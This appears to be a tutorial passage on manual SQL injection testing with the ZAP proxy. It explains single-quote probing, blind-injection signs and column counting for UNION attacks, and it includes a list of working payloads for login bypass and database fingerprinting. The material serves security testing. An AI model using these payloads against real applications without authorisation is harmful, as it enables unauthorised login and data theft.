Manual SQL Injection Testing with ZAP

Manual testing excels at finding complex SQL injection vulnerabilities that automated scanning might miss. Use ZAP's proxy features to intercept requests containing data that might reach SQL queries. Common targets include login forms, search functions, product filters, and any feature querying databases. The Manual Request Editor enables precise payload crafting for specific injection scenarios.

Basic manual testing starts with single quote injection. Intercept a request and append a single quote (') to parameter values. Send the modified request and analyze the response. Database errors strongly indicate SQL injection. Even without explicit errors, look for application behavior changes: missing content, different page structures, or unusual responses. These subtle indicators might reveal blind SQL injection possibilities.

# Progressive SQL Injection Payloads for Manual Testing
' 
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /*
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT 1,2,3--
' UNION SELECT database(),user(),version()--
admin' --
admin' OR '1'='1' --

Advanced manual techniques explore specific injection scenarios. UNION-based injection requires determining the number of columns in the original query. Systematically increase columns in UNION SELECT statements until errors disappear. Error messages often reveal valuable information about table structures and column names. Use this information to craft targeted attacks extracting specific data.